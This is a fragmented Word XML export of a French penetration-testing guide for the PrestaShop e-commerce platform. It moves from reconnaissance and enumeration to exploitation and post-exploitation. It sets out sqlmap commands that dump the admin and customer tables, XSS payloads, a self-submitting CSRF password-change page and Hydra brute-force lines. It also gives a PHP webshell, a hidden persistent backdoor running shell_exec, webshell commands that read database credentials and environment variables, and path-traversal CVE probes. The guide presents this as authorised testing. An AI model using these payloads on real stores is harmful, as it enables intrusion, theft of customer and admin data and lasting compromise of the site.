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86A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE786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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>GUIDE PROFESSIONNEL DE PENTEST PRESTASHOP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Guide Complet d'Évaluation de Vulnérabilités et de Tests d'Intrusion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25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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Document de Référence Technique</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Cible :</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>PrestaShop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> E-commerce Platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Portée :</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Penetration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Autorisation :</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Carte Blanche (Full Scope)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26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TABLE DES MATIÈRES</w:t>
      </w:r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config" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Configuration de l'Environnement</w:t>
        </w:r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recon" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Phase de Reconnaissance</w:t>
        </w:r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enum" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t xml:space="preserve">Énumération et </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Fingerprinting</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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vuln" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Analyse des Vulnérabilités</w:t>
        </w:r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exploit" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Exploitation</w:t>
        </w:r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post-exploit" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Post-Exploitation</w:t>
        </w:r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prestashop" w:history="1">
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t xml:space="preserve">Tests Spécifiques </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>PrestaShop</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00D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hyperlink w:anchor="reporting" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00DE786A">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>Reporting</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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27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1. CONFIGURATION DE L'ENVIRONNEMENT {#config}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Installation des Outils Essentiels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Mise à jour du système (Kali/Debian/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Ubuntu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update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upgrade -y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Framework de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pentest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sudo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apt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install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metasploit-framework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Scanners de vulnérabilités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lastRenderedPageBreak/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Outils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web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burpsuite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zaproxy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firefox-esr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Utilitaires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sudo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apt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install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-y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git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wget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python3 python3-pip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Outils spécialisés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pip3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droopescan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wfuzz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Installer Nuclei (scanner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moderne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GO111MODULE=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on go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github.com/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projectdiscovery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/nuclei/v3/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nuclei@latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Structure de Projet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l'environnement de travail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mkdir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-p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pentest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-target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cd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pentest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-target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les dossiers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mkdir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enumeration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vulnerabilities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exploits reports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screenshots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28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2. PHASE DE RECONNAISSANCE {#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>recon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>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Variables Globales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REMPLACER PAR VOTRE CIBLE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export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TARGET=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"shop.example.com"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export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TARGET_IP=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"192.168.1.100"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Reconnaissance Passive (OSINT)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Whois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lookup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whois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reconnaissance/whois.txt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DNS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enumeration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dig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ANY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reconnaissance/dns.txt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host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-a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reconnaissance/dns.txt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lastRenderedPageBreak/>
        <w:t># Sous-domaines avec Sublist3r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sublist3r -d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-o reconnaissance/subdomains.txt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Wayback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Machine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"http://web.archive.org/cdx/search/cdx?url=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/*&amp;output=json"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wayback.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Google </w:t>
      </w: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Dorks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(Manuel)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filetype:sql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filetype:log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inurl:admin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shop.example.com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intitle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:"index of"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shop.example.com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"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intext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:"password"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Reconnaissance Active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rapide initial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reconnaissance/nmap-initial.txt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complet des ports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-p- -T4 -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reconnaissance/nmap-full.txt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avec détection de versions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-A -p-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oX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reconnaissance/nmap-detailed.xml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de vulnérabilités NSE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--script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vuln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reconnaissance/nmap-vulnerabilities.txt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Conversion XML vers HTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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xsltproc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reconnaissance/nmap-detailed.xml -o reconnaissance/nmap-report.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5751D" w:rsidRPr="00DE786A" w:rsidRDefault="00E5751D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Identification Technologies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WhatWeb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whatweb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reconnaissance/whatweb.txt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Headers HTTP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reconnaissance/http-headers.txt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Fichiers standards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/robots.txt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reconnaissance/robots.txt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/sitemap.xml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reconnaissance/sitemap.xml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29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3. ÉNUMÉRATION ET FINGERPRINTING {#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>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Énumération de Répertoires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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Dirb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/share/wordlists/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/common.txt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enumeration/dirb-common.txt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Extensions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PrestaShop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/share/wordlists/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/big.txt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-X .php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sql,.bak,.old,.zip,.tar.gz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enumeration/dirb-extensions.txt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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Gobuster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Installation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SecLists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clone https://github.com/danielmiessler/SecLists.git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répertoires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gobuster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dir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-w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/Discovery/Web-Content/directory-list-2.3-medium.txt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enumeration/gobuster-dirs.txt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-x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,html,txt,sql,zip,bak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-t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50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Wordlist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spécifique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gobuster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dir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-w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/Discovery/Web-Content/CMS/prestashop.txt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enumeration/gobuster-prestashop.txt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-t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50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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Dirsearch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lastRenderedPageBreak/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Installation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clone https://github.com/maurosoria/dirsearch.git ~/tools/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dirsearch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Scan avec extensions multiples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cd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~/tools/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dirsearch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python3 dirsearch.py -u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,html,js,txt,xml,sql,zip,bak,old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--format plain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pentest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-target/enumeration/dirsearch-results.txt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 xml:space="preserve">Fingerprinting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PrestaShop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE78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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Détection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Version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Via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CHANGELOG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/docs/CHANGELOG.txt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10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/CHANGELOG.txt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10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Via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headers et meta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\|version"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Via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JavaScript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/themes/default/js/global.js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version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eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Énumération Modules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Wordlist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modules populaires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enumeration/prestashop-common-modules.txt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blockcart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blockuserinfo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blockwishlist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blocksearch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blocktopmenu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ps_emailsubscription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ps_shoppingcart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ps_featuredproducts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ps_searchbar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ps_contactinfo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paypal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stripe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onepagecheckout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productcomments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advancedsearch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ps_facetedsearch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gamification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dashtrends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dashgoals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dashactivity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Scan des modules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module;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/null -w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https://$TARGET/modules/$module/)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-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$module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enumeration/prestashop-common-modules.txt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enumeration/modules-found.txt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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Panel Admin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Chemins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d'admin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communs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enumeration/admin-paths.txt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admin123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administration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backend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backoffice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manager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panel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adminpanel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adminps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myadmin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-admin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automatique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bookmarkStart w:id="0" w:name="_GoBack"/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path;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/null -w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https://$TARGET/$path)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200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301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302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"[+] FOUND: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$path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(HTTP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)"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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enumeration/admin-paths.txt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enumeration/admin-found.txt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30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4. ANALYSE DES VULNÉRABILITÉS {#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>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Nuclei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- Scanner Moderne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Update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templates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nuclei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-update-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templates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Scan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spécifique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nuclei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-t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nuclei-templates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/http/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cves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-t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nuclei-templates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/http/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exposures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-severity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critical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,high,medium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vulnerabilities/nuclei-prestashop.txt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complet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nuclei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-severity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critical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,high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vulnerabilities/nuclei-full.txt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Nikto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Scan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 vulnerabilities/nikto-basic.txt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Scan complet avec tous les plugins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-h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-Tuning 123456789abc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-Display V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vulnerabilities/nikto-full.txt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SQLMap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- Injection SQL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Test page de recherche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search.php?search_query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=test"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--random-agent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--level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--risk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vulnerabilities/sqlmap-search.txt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page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produit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dbs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--random-agent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vulnerabilities/sqlmap-product.txt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Crawler automatique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--crawl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--random-agent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--forms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vulnerabilities/sqlmap-crawl.txt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Avec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authentification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cart.php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--cookie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-session=abc123xyz"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--level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--risk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vulnerabilities/sqlmap-authenticated.txt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XSS Testing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Installation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XSStrike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git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clone https://github.com/s0md3v/XSStrike.git ~/tools/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cd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~/tools/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pip3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-r requirements.txt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Test XSS sur recherche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python3 xsstrike.py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/search.php?search_query=test"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pentest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-target/vulnerabilities/xss-search.txt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lastRenderedPageBreak/>
        <w:t># Test avec crawling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python3 xsstrike.py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--crawl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pentest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-target/vulnerabilities/xss-crawl.txt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 xml:space="preserve">Payloads XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Manuels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Créer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wordlist de payloads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vulnerabilities/xss-payloads.txt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script&gt;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alert('XSS')&lt;/script&gt;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img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src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=x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onerror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svg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onload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"&gt;&lt;script&gt;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spellStart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String.fromCharCode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(88,83,83))&lt;/script&gt;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'&gt;&lt;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img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src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=x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onerror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javascript:alert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'XSS')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iframe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src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javascript:alert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'XSS')"&gt;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&lt;body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onload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manuel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payload;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search.php?search_query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$payload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$payload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vulnerabilities/xss-payloads.txt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CSRF Testing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PoC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CSRF changement de mot de passe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vulnerabilities/csrf-poc-password.html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html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body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&lt;h1&gt;CSRF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 Password Change&lt;/h1&gt;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&lt;form action="https://TARGET/account/password" method="POST"&gt;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&lt;input type="hidden" name="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old_passwd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value="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oldpass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/&gt;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&lt;input type="hidden" name="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passwd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value="HACKED123" /&gt;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&lt;input type="hidden" name="confirmation" value="HACKED123" /&gt;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&lt;input type="submit" value="Submit" /&gt;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&lt;/form&gt;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script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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document.forms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[0].submit();&lt;/script&gt;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&lt;/body&gt;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&lt;/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html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Vérifier présence de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tokens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CSRF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/account/password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csrf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\|token"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31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5. EXPLOITATION {#exploit}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SQL Injection Exploitation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1. Lister bases de données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/product.php?id=1"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dbs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--batch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2. Énumérer tables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/product.php?id=1"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-D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prestashop_db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--tables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--batch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3. Dumper table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admins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/product.php?id=1"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-D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prestashop_db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ps_employee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--dump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-o exploits/admin-dump.txt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4. Dumper clients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product.php?id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=1"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prestashop_db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ps_customer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--dump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exploits/customer-dump.txt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5. Shell OS (si possible)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/product.php?id=1"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-shell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 xml:space="preserve">Modules </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Vulnérables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Rechercher exploits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searchsploit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tee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exploits/searchsploit-results.txt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Télécharger exploit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searchsploit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webapps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/12345.txt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Webshell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basique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exploits/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shell.php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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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isset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($_REQUEST['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'])){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= ($_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REQUEST[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']);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webshell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/uploads/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shell.php?cmd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whoami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Metasploit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Framework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Lancer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Metasploit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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE786A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t xml:space="preserve">Dans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">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exploit/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unix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webapp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prestashop_upload_exec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RHOSTS target.com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RPORT 443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SSL true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run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Brute Force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lastRenderedPageBreak/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Hydra -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Admin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 login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hydra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-l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admin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-P ~/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt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https-post-form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/admin1234/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index.php:email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=^USER^&amp;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passwd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=^PASS^:error"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-t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-o exploits/hydra-admin.txt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WFuzz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wfuzz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-c -z file,~/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/Passwords/Common-Credentials/10k-most-common.txt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"email=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admin@admin.com&amp;passwd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=FUZZ"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401,403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/admin/index.php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32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6. POST-EXPLOITATION {#post-exploit}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Backdoor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Persistante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Créer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backdoor avec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auth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exploits/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backdoor.php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&lt;?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php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$password = "MySecretPass123";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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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isset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($_GET['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auth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']) &amp;&amp; $_GET['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auth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'] === $password){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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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isset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($_GET['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'])){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"&lt;pre&gt;" .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shell_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exec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(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$_GET['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']) . "&lt;/pre&gt;";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} else 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"Backdoor active";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}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 else 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http_response_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code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(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404);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Collecte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Informations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Configuration DB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/shell.php?cmd=cat%20/var/www/html/config/settings.inc.php"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post-exploitation/db-config.txt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Fichiers SQL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?cmd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=find%20/var/www%20-name%20'*.sql'"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post-exploitation/sql-files.txt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Utilisateur système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/shell.php?cmd=whoami"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post-exploitation/whoami.txt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/shell.php?cmd=id"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post-exploitation/id.txt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Variables environnement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/shell.php?cmd=env"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post-exploitation/env.txt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Privilege Escalation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Télécharger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LinPEAS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wget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https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh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 Exécuter via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webshell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/uploads/linpeas.sh"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bash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post-exploitation/linpeas.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A3B80" w:rsidRDefault="005A3B80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRDefault="00DE786A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRDefault="00DE786A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br w:type="page"/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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GUIDE PRESTASHOP - PARTIE 2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 xml:space="preserve">Tests Spécifiques et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Reporting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33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7. TESTS SPÉCIFIQUES PRESTASHOP {#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>prestashop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>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CVE Connues </w:t>
      </w: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PrestaShop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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CVE-2022-36408 - SQL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search.php?controller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search&amp;s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=test"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--level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--risk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vulnerabilities/cve-2022-36408.txt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CVE-2023-30838 - Blind SQL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/index.php?fc=module&amp;module=productcomments&amp;controller=CommentGrade&amp;id_products[]=1%27"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vulnerabilities/cve-2023-30838-test.txt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CVE-2023-30535 - Unauthorized Access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/admin-dev/filemanager/ajax_calls.php?action=get_file&amp;file=../config/settings.inc.php"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vulnerabilities/cve-2023-30535-test.txt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CVE-2024-34716 - Remote Code Execution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/modules/vulnerable/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upload.php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shell.php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vulnerabilities/cve-2024-34716-test.txt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Scanner </w:t>
      </w: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PrestaShop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Personnalisé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un scanner automatisé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~/tools/prestashop-scanner.sh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RED='\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033[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0;31m'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GREEN='\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033[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0;32m'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YELLOW='\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033[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1;33m'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NC='\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033[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0m'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TARGET=$1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-z "$TARGET" ];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"Usage: $0 &lt;target-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exit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"${GREEN}[*]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Security Scanner${NC}"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"${GREEN}[*] Target: $TARGET${NC}"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 Detection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"${YELLOW}[+] Detecting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Version...${NC}"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VERSION=$(curl -s $TARGET/docs/CHANGELOG.txt 2&gt;/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| head -n 1)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! -z "$VERSION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]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${GREEN}Version: $VERSION${NC}"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${RED}Version not detected${NC}"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Check exposed files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"${YELLOW}[+] Checking exposed files...${NC}"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EXPOSED_FILES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=(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install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docs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"CHANGELOG.txt"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config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settings.inc.php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download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upload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"app/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config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parameters.php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".git/"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composer.json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phpinfo.php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file in "${EXPOSED_FILES[@]}"; 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$TARGET/$file)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200 ];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${RED}[!] EXPOSED: $file (HTTP $STATUS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)$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elif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403 ];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${YELLOW}[~] FORBIDDEN: $file (HTTP $STATUS)${NC}"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${GREEN}[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A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SAFE: $file (HTTP $STATUS)${NC}"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3.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Check backup files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"${YELLOW}[+] Checking for backup files...${NC}"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BACKUP_EXTS=(".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".sql.gz" ".tar.gz" ".zip" ".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bak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".old" ".backup")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in "${BACKUP_EXTS[@]}"; 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backup$ext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200 ];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${RED}[!] FOUND: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backup$ext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4.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Admin panel detection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"${YELLOW}[+] Searching admin panel...${NC}"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ADMIN_PATHS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"admin" "admin1" "admin123" "administration" "backend"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adminps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path in "${ADMIN_PATHS[@]}"; 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$TARGET/$path)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200 ] ||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301 ] ||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302 ];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${RED}[!] FOUND: /$path (HTTP $STATUS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)$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5.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Module enumeration (top 10)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"${YELLOW}[+] Enumerating common modules...${NC}"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MODULES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=(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blockcart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ps_shoppingcart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ps_emailsubscription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ps_featuredproducts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paypal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stripe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productcomments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ps_facetedsearch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ps_searchbar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blocksearch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module in "${MODULES[@]}"; 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/null -w "%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}" $TARGET/modules/$module/)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200 ] || [ $STATUS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403 ];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${GREEN}[</w:t>
      </w:r>
